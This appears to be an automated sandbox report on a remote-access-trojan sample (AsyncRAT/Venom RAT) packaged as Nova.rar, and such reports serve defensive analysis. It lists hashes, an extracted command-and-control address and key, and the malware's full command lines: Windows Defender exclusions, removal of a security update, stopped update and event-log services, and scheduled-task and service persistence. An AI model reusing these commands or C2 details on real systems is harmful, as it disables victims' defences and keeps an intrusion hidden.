Analysis
-
max time kernel
37s -
max time network
40s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-11-2024 18:54
Static task
static1
Behavioral task
behavioral1
Sample
Nova.rar
Resource
win10ltsc2021-20241023-en
General
-
Target
Nova.rar
-
Size
2.1MB
-
MD5
50ee1cf21948c6015354e9c1a94ca5db
-
SHA1
f2f6fb19a2db75d2d5515fd3a20c66eb8f3e6d42
-
SHA256
8fe639c3cbdcb49a5246f85ce136f14c8c0ad5150c6e38b5eb66eced9d4c4329
-
SHA512
46c8a6e2818972ec363b5905838e05828a87b10c7991ae5124c485ccf625da0cff4985d675bbda08a9eccf1fc1027c5db0a22f8e99c732f7593f66c68f3654dc
-
SSDEEP
49152:OWYU2F4Tu9YiDuTnlvraYTi04JIBv1WteMcP+1HFFNFwAAnv4qy+d:ZYLCiDuDluYe0cUwp31bN1Aj
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
193.161.193.99:53757
hsaurcrgqwhjimnkbht
-
delay
1
-
install
true
-
install_file
Load.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x00280000000450b2-34.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6076 powershell.exe 1664 powershell.exe -
Creates new service(s) 2 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation Load.exe -
Executes dropped EXE 6 IoCs
pid Process 5688 Loader.exe 5540 Loader.exe 5392 Load.exe 5184 Load.exe 5968 Loader.exe 1252 nnegaqupnsqi.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5816 powercfg.exe 2636 powercfg.exe 1896 powercfg.exe 5676 powercfg.exe 4832 powercfg.exe 1492 powercfg.exe 1568 powercfg.exe 1936 powercfg.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Loader.exe -
resource yara_rule behavioral1/memory/4508-151-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4508-150-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4508-153-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4508-156-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4508-162-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2108 sc.exe 3136 sc.exe 3420 sc.exe 4084 sc.exe 1960 sc.exe 1944 sc.exe 2224 sc.exe 3960 sc.exe 5472 sc.exe 6024 sc.exe 5456 sc.exe 4172 sc.exe 5976 sc.exe 4316 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 5092 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5592 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2700 7zFM.exe 2700 7zFM.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 5392 Load.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 5184 Load.exe 5184 Load.exe 5184 Load.exe 5540 Loader.exe 6076 powershell.exe 6076 powershell.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 5540 Loader.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe 1252 nnegaqupnsqi.exe 1664 powershell.exe 1664 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2700 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeRestorePrivilege 2700 7zFM.exe Token: 35 2700 7zFM.exe Token: SeSecurityPrivilege 2700 7zFM.exe Token: SeDebugPrivilege 5392 Load.exe Token: SeDebugPrivilege 5184 Load.exe Token: SeSecurityPrivilege 2700 7zFM.exe Token: SeDebugPrivilege 6076 powershell.exe Token: SeIncreaseQuotaPrivilege 6076 powershell.exe Token: SeSecurityPrivilege 6076 powershell.exe Token: SeTakeOwnershipPrivilege 6076 powershell.exe Token: SeLoadDriverPrivilege 6076 powershell.exe Token: SeSystemProfilePrivilege 6076 powershell.exe Token: SeSystemtimePrivilege 6076 powershell.exe Token: SeProfSingleProcessPrivilege 6076 powershell.exe Token: SeIncBasePriorityPrivilege 6076 powershell.exe Token: SeCreatePagefilePrivilege 6076 powershell.exe Token: SeBackupPrivilege 6076 powershell.exe Token: SeRestorePrivilege 6076 powershell.exe Token: SeShutdownPrivilege 6076 powershell.exe Token: SeDebugPrivilege 6076 powershell.exe Token: SeSystemEnvironmentPrivilege 6076 powershell.exe Token: SeRemoteShutdownPrivilege 6076 powershell.exe Token: SeUndockPrivilege 6076 powershell.exe Token: SeManageVolumePrivilege 6076 powershell.exe Token: 33 6076 powershell.exe Token: 34 6076 powershell.exe Token: 35 6076 powershell.exe Token: 36 6076 powershell.exe Token: SeShutdownPrivilege 4832 powercfg.exe Token: SeCreatePagefilePrivilege 4832 powercfg.exe Token: SeShutdownPrivilege 5676 powercfg.exe Token: SeCreatePagefilePrivilege 5676 powercfg.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeCreatePagefilePrivilege 1568 powercfg.exe Token: SeShutdownPrivilege 1492 powercfg.exe Token: SeCreatePagefilePrivilege 1492 powercfg.exe Token: SeDebugPrivilege 1664 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2700 7zFM.exe 2700 7zFM.exe 2700 7zFM.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5184 Load.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2700 wrote to memory of 5688 2700 7zFM.exe 88 PID 2700 wrote to memory of 5688 2700 7zFM.exe 88 PID 5688 wrote to memory of 5540 5688 Loader.exe 90 PID 5688 wrote to memory of 5540 5688 Loader.exe 90 PID 5688 wrote to memory of 5392 5688 Loader.exe 91 PID 5688 wrote to memory of 5392 5688 Loader.exe 91 PID 5392 wrote to memory of 4516 5392 Load.exe 92 PID 5392 wrote to memory of 4516 5392 Load.exe 92 PID 5392 wrote to memory of 5312 5392 Load.exe 94 PID 5392 wrote to memory of 5312 5392 Load.exe 94 PID 5312 wrote to memory of 5092 5312 cmd.exe 96 PID 5312 wrote to memory of 5092 5312 cmd.exe 96 PID 4516 wrote to memory of 5592 4516 cmd.exe 97 PID 4516 wrote to memory of 5592 4516 cmd.exe 97 PID 5312 wrote to memory of 5184 5312 cmd.exe 98 PID 5312 wrote to memory of 5184 5312 cmd.exe 98 PID 2700 wrote to memory of 5968 2700 7zFM.exe 100 PID 2700 wrote to memory of 5968 2700 7zFM.exe 100 PID 5828 wrote to memory of 5788 5828 cmd.exe 108 PID 5828 wrote to memory of 5788 5828 cmd.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Nova.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\7zOC8A25DE7\Loader.exe"C:\Users\Admin\AppData\Local\Temp\7zOC8A25DE7\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:5540 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:5828 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5788
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3960
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KFUNOUIY"4⤵
- Launches sc.exe
PID:6024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KFUNOUIY" binpath= "C:\ProgramData\xqgefzhhbtbb\nnegaqupnsqi.exe" start= "auto"4⤵
- Launches sc.exe
PID:5472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3420
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KFUNOUIY"4⤵
- Launches sc.exe
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\Load.exe"C:\Users\Admin\AppData\Local\Temp\Load.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5392 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Load" /tr '"C:\Users\Admin\AppData\Roaming\Load.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Load" /tr '"C:\Users\Admin\AppData\Roaming\Load.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF4EF.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:5312 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:5092
-
-
C:\Users\Admin\AppData\Roaming\Load.exe"C:\Users\Admin\AppData\Roaming\Load.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5184
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zOC8A76668\Loader.exe"C:\Users\Admin\AppData\Local\Temp\7zOC8A76668\Loader.exe"2⤵
- Executes dropped EXE
PID:5968 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵PID:4496
-
-
C:\Users\Admin\AppData\Local\Temp\Load.exe"C:\Users\Admin\AppData\Local\Temp\Load.exe"3⤵PID:2308
-
-
-
C:\ProgramData\xqgefzhhbtbb\nnegaqupnsqi.exeC:\ProgramData\xqgefzhhbtbb\nnegaqupnsqi.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1252 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:4176
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4224
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4316
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1944
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2108
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:1936
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:2636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:1896
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1612
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:4508
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b08c36ce99a5ed11891ef6fc6d8647e9
SHA1db95af417857221948eb1882e60f98ab2914bf1d
SHA256cc9248a177495f45ec70b86c34fc5746c56730af36ace98ac7eb365dbafda674
SHA51207e62581eace395b0a9699d727761648103180c21155d84ea09140f9e1c9690705c419118545aa67a564334bbde32710225fe3aa92b0b4b4210cb91f0058b1ea
-
Filesize
654B
MD511c6e74f0561678d2cf7fc075a6cc00c
SHA1535ee79ba978554abcb98c566235805e7ea18490
SHA256d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63
SHA51232c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0
-
Filesize
2.1MB
MD5a07c79f9e2dd72f3b884928ee384344e
SHA188df6b54a3e53a501b09b32de2def406820879fa
SHA25635c4d936db755868a37561663cd4b279b338413db5f89c2f9df71d74a6d35b61
SHA512cdb6957a1e59b053fdd8f0d43d9b1ba575da2140c5d2c547b87e8a5b1199f2d071f66152ade3cfdb5294903cf42f395a948b28ea87aef9d9aa6eacdeaffdd1fd
-
Filesize
74KB
MD54fc5086bcb8939429aea99f7322e619b
SHA18d3bd7d005710a8ae0bd0143d18b437be20018d7
SHA256e31d6dc4d6f89573321f389c5b3f12838545ff8d2f1380cfba1782d39853e9fd
SHA51204e230f5b39356aecf4732ac9a2f4fea96e51018907e2f22c7e3f22e51188b64cdb3e202fe324f5e3500761fae43f898bf9489aa8faa34eff3566e1119a786d2
-
Filesize
2.5MB
MD535c54b6a9227ccb7149698254dc8dd52
SHA133433b0716128f7c887d7929ec50fab495e45f38
SHA256db7744a5e7567b151e15c6159b03eb71974233db90716b38d7bb726fd61798e4
SHA512492de363f0252005a303b7b169721f8536d131bbca71ef37bae59b4b17427dda869c14eea72fd3ed69efc0a3b19b9c3b18e7d6ada1721fbf9b0ce3bfaa57cc12
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
148B
MD5b80736b9aa1ebcd23038385ddc875cb7
SHA177cba7b61e3415fa1b489b57bf55102c92314270
SHA256102ce1db33d240710bc0042cb603c41a52fc96faf0fb3d515e1d443676003c03
SHA512b83861b3b0f57b43c8bb9ffe3af8a28ec588e4223c7fe084a70b1016ac471b39d26785b57921a4b7d17aaf7bbcc4b7922d1c1fae55b39ffc1bffb352749bfb83
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b